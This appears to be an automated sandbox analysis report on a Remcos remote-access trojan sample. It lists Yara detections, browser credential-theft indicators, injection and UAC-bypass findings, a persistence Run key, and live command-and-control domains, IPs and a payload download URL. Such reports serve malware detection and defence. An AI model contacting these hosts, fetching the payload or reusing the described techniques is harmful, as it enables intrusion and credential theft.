              Source: Yara matchFile source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4603655140.0000000000607000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.2435347353.0000000021D67000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.2511848182.0000000033ED0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: jW3NEKvxH1.exe PID: 616, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 4576, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 3648, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 2680, type: MEMORYSTR
              Contains functionality to steal Chrome passwords or cookies
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data6_2_0292B21B
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data19_2_0294B21B
              Contains functionality to steal Firefox passwords or cookies
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\6_2_0292B335
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: \key3.db6_2_0292B335
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\19_2_0294B335
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: \key3.db19_2_0294B335

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Windows\SysWOW64\SndVol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-RX8VCLJump to behavior
              Source: C:\Windows\SysWOW64\SndVol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-RX8VCL
              Source: C:\Windows\SysWOW64\colorcpl.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-RX8VCL
              Yara detected Remcos RAT
              Source: Yara matchFile source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4603655140.0000000000607000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.2435347353.0000000021D67000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.2511848182.0000000033ED0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: jW3NEKvxH1.exe PID: 616, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 4576, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 3648, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 2680, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: cmd.exe6_2_02925042
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: cmd.exe19_2_02945042

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure1
              Valid Accounts              		1
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Disable or Modify Tools              		1
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services11
              Archive Collected Data              		12
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Command and Scripting Interpreter              		1
              Valid Accounts              		1
              Bypass User Account Control              		1
              Deobfuscate/Decode Files or Information              		111
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol111
              Input Capture              		21
              Encrypted Channel              		Exfiltration Over Bluetooth1
              Defacement
              Email AddressesDNS ServerDomain Accounts2
              Service Execution              		1
              Windows Service              		1
              Valid Accounts              		2
              Obfuscated Files or Information              		2
              Credentials In Files              		1
              System Service Discovery              		SMB/Windows Admin Shares3
              Clipboard Data              		1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron1
              Registry Run Keys / Startup Folder              		11
              Access Token Manipulation              		1
              Timestomp              		NTDS1
              System Network Connections Discovery              		Distributed Component Object ModelInput Capture1
              Remote Access Software              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
              Windows Service              		1
              DLL Side-Loading              		LSA Secrets2
              File and Directory Discovery              		SSHKeylogging2
              Non-Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts321
              Process Injection              		1
              Bypass User Account Control              		Cached Domain Credentials45
              System Information Discovery              		VNCGUI Input Capture113
              Application Layer Protocol              		Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
              Registry Run Keys / Startup Folder              		1
              File Deletion              		DCSync241
              Security Software Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job221
              Masquerading              		Proc Filesystem2
              Virtualization/Sandbox Evasion              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Valid Accounts              		/etc/passwd and /etc/shadow1
              Process Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron2
              Virtualization/Sandbox Evasion              		Network Sniffing1
              Application Window Discovery              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
              Access Token Manipulation              		Input Capture1
              System Owner/User Discovery              		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task321
              Process Injection              		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569880 Sample: jW3NEKvxH1.exe Startdate: 06/12/2024 Architecture: WINDOWS Score: 100 58 zara.master-workdone.com.ua 2->58 60 manazara.master-workdone.com.ua 2->60 62 4 other IPs or domains 2->62 78 Suricata IDS alerts for network traffic 2->78 80 Found malware configuration 2->80 82 Malicious sample detected (through community Yara rule) 2->82 84 10 other signatures 2->84 9 jW3NEKvxH1.exe 1 6 2->9         started        14 Dlaybpxl.PIF 2->14         started        16 Dlaybpxl.PIF 2->16         started        signatures3 process4 dnsIp5 66 s3-w.us-east-1.amazonaws.com 3.5.30.3, 443, 49718 AMAZON-AESUS United States 9->66 68 bitbucket.org 185.166.143.50, 443, 49715, 49716 AMAZON-02US Germany 9->68 48 C:\Users\Public\Libraries\lxpbyalD.cmd, DOS 9->48 dropped 50 C:\Users\Public\Libraries\Dlaybpxl, data 9->50 dropped 52 C:\Users\Public\Dlaybpxl.url, MS 9->52 dropped 94 Early bird code injection technique detected 9->94 96 Allocates memory in foreign processes 9->96 98 Queues an APC in another process (thread injection) 9->98 100 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 9->100 18 SndVol.exe 3 9->18         started        22 cmd.exe 1 9->22         started        24 esentutl.exe 2 9->24         started        102 Multi AV Scanner detection for dropped file 14->102 27 SndVol.exe 14->27         started        29 colorcpl.exe 16->29         started        file6 signatures7 process8 dnsIp9 64 zara.master-workdone.com.ua 104.243.42.254, 49730, 49785, 49856 RELIABLESITEUS United States 18->64 86 Contains functionality to bypass UAC (CMSTPLUA) 18->86 88 Detected Remcos RAT 18->88 90 Contains functionalty to change the wallpaper 18->90 92 4 other signatures 18->92 31 esentutl.exe 2 22->31         started        35 alpha.pif 1 22->35         started        37 esentutl.exe 2 22->37         started        41 6 other processes 22->41 46 C:\Users\Public\Libraries\Dlaybpxl.PIF, PE32 24->46 dropped 39 conhost.exe 24->39         started        file10 signatures11 process12 file13 54 C:\Users\Public\alpha.pif, PE32 31->54 dropped 72 Drops PE files to the user root directory 31->72 74 Drops PE files with a suspicious file extension 31->74 76 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 31->76 43 xpha.pif 1 35->43         started        56 C:\Users\Public\xpha.pif, PE32 37->56 dropped signatures14 process15 dnsIp16 70 127.0.0.1 unknown unknown 43->70

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              jW3NEKvxH1.exe55%ReversingLabsWin32.Trojan.Remcos

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\Public\Libraries\Dlaybpxl.PIF55%ReversingLabsWin32.Trojan.Remcos
              C:\Users\Public\alpha.pif0%ReversingLabs
              C:\Users\Public\xpha.pif0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              manazara.master-workdone.com.ua0%Avira URL Cloudsafe
              zara.master-workdone.com.ua0%Avira URL Cloudsafe
              http://ocsp.sectigo.com0C0%Avira URL Cloudsafe
              http://www.pmail.com0%Avira URL Cloudsafe
              https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              s3-w.us-east-1.amazonaws.com
              		3.5.30.3
              		truefalse
                		high
                bitbucket.org
                		185.166.143.50
                		truefalse
                  		high
                  manazara.master-workdone.com.ua
                  		104.243.42.254
                  		truetrue
                    		unknown
                    zara.master-workdone.com.ua
                    		104.243.42.254
                    		truetrue
                      		unknown
                      bbuseruploads.s3.amazonaws.com
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://bitbucket.org/masterservicwes/mastermanservices/downloads/165_Dlaybpxlokefalse
                          		high
                          manazara.master-workdone.com.uatrue
                          • Avira URL Cloud: safe
                          		unknown
                          zara.master-workdone.com.uatrue
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpfalse
                            		high
                            https://bitbucket.org/jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000819000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.netjW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://sectigo.com/CPS0jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high
                                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		high
                                    http://ocsp.sectigo.com0jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		high
                                      https://web-security-reports.services.atlassian.com/csp-report/bb-websitejW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		high
                                          https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpfalse
                                              		high
                                              https://bitbucket.org/masterservicwes/majW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020B1D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netjW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://dz8aopenkvv6s.cloudfront.netjW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://bbuseruploads.s3.amazonaws.com:443/03fa479d-619a-4b32-874d-a4ddf918e902/downloads/2601acd3-6jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://geoplugin.net/json.gpSndVol.exefalse
                                                        		high
                                                        http://geoplugin.net/json.gp/CjW3NEKvxH1.exe, 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, SndVol.exe, 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://remote-app-switcher.prod-east.frontend.public.atl-paas.netjW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netjW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://cdn.cookielaw.org/jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://bbuseruploads.s3.amazonaws.com/03fa479d-619a-4b32-874d-a4ddf918e902/downloads/2601acd3-63c3-jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://aui-cdn.atlassian.com/jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://remote-app-switcher.stg-east.frontend.public.atl-paas.netjW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.pmail.comjW3NEKvxH1.exe, jW3NEKvxH1.exe, 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2145952303.0000000002856000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2293566287.000000007FAB0000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2266672340.0000000002854000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2146235666.000000007F96F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://bbuseruploads.s3.amazonaws.com/jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://ocsp.sectigo.com0CjW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown

                                                                          World Map of Contacted IPs

                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs

                                                                          Public IPs

                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          104.243.42.254
                                                                          		manazara.master-workdone.com.uaUnited States
                                                                          		23470RELIABLESITEUStrue
                                                                          185.166.143.50
                                                                          		bitbucket.orgGermany
                                                                          		16509AMAZON-02USfalse
                                                                          3.5.30.3
                                                                          		s3-w.us-east-1.amazonaws.comUnited States
                                                                          		14618AMAZON-AESUSfalse

                                                                          Private

                                                                          IP
                                                                          127.0.0.1

                                                                          General Information

                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1569880
                                                                          Start date and time:2024-12-06 11:03:38 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 11m 1s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:33
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:jW3NEKvxH1.exe
                                                                          renamed because original name is a hash value
                                                                          Original Sample Name:e4696be1368f7ac260c605c7b4f7eeaf.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.rans.troj.spyw.expl.evad.winEXE@34/10@4/4
                                                                          EGA Information:
                                                                          • Successful, ratio: 100%
                                                                          HCA Information:
                                                                          • Successful, ratio: 99%
                                                                          • Number of executed functions: 71
                                                                          • Number of non-executed functions: 214
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                          Warnings

                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                          • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • VT rate limit hit for: jW3NEKvxH1.exe

                                                                          Simulations

                                                                          Behavior and APIs

                                                                          TimeTypeDescription
                                                                          05:04:33API Interceptor2x Sleep call for process: jW3NEKvxH1.exe modified
                                                                          05:04:57API Interceptor2x Sleep call for process: Dlaybpxl.PIF modified
                                                                          05:05:21API Interceptor3143733x Sleep call for process: SndVol.exe modified
                                                                          11:04:48AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Dlaybpxl C:\Users\Public\Dlaybpxl.url
                                                                          11:04:56AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Dlaybpxl C:\Users\Public\Dlaybpxl.url

                                                                          Joe Sandbox View / Context

                                                                          IPs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          185.166.143.50yG53aU3gGm.exeGet hashmaliciousUnknownBrowse
                                                                            yG53aU3gGm.exeGet hashmaliciousUnknownBrowse
                                                                              lnvoice-1620804301.pdf (1).jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                ft.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  invoice-1664809283.pdf (1).jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                    https://getgreenshot.orgGet hashmaliciousUnknownBrowse
                                                                                      qqig1mHX8U.exeGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                                                        3o2WdGwcLF.vbsGet hashmaliciousUnknownBrowse
                                                                                          0a0#U00a0.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                            https://t.ly/SjDNXGet hashmaliciousPython Stealer, BraodoBrowse
                                                                                              3.5.30.3https://globalmalls.network/Get hashmaliciousUnknownBrowse
                                                                                                http://kw.tikto6kbx.com/Get hashmaliciousUnknownBrowse

                                                                                                  Domains

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  bitbucket.orgyG53aU3gGm.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 185.166.143.50
                                                                                                  yG53aU3gGm.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 185.166.143.50
                                                                                                  lnvoice-1620804301.pdf .jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                  • 185.166.143.48
                                                                                                  lnvoice-1620804301.pdf (1).jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                  • 185.166.143.50
                                                                                                  ft.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 185.166.143.50
                                                                                                  https://bitbucket.org/ziphose/obmen/downloads/Doc.7zGet hashmaliciousRMSRemoteAdminBrowse
                                                                                                  • 185.166.143.49
                                                                                                  invoice-6483728493.pdf .jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                  • 185.166.143.49
                                                                                                  invoice-1664809283.pdf (1).jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                  • 185.166.143.50
                                                                                                  invoice-1664809283.pdf .jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                  • 185.166.143.48
                                                                                                  https://getgreenshot.orgGet hashmaliciousUnknownBrowse
                                                                                                  • 185.166.143.50
                                                                                                  s3-w.us-east-1.amazonaws.comyG53aU3gGm.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 52.216.236.243
                                                                                                  https://su.onamoc.comano.us/XcEhOOWF1eS9pVi9RYkVJUURCV1RYR0RGd2dHRjNGcUhDdkhxWFpsdUp1UWlVZk83UmwwZjIrYmdvdzh3aFZ3V1NpdnFZTG4zSE16TDBDYU5yc2hZVWQ3UU1GNHRON29GNEpZZkN6SGY0Nk8rdVp2U2tOWmNQbDNnZ0lyalR3OXBmeDlrU0FLKzlVeHI4YXk2YUFmaTRMUUR5TkhWNlhtSzMwQ2IrcU16UzRXUWROZDFlc3k0aldiNy0td25BVUltZUhhSGpCZG5tRS0tN1VocVZyWm1JT2tITW5yVjN4YWNxdz09?cid=2310889346Get hashmaliciousKnowBe4Browse
                                                                                                  • 52.217.199.225
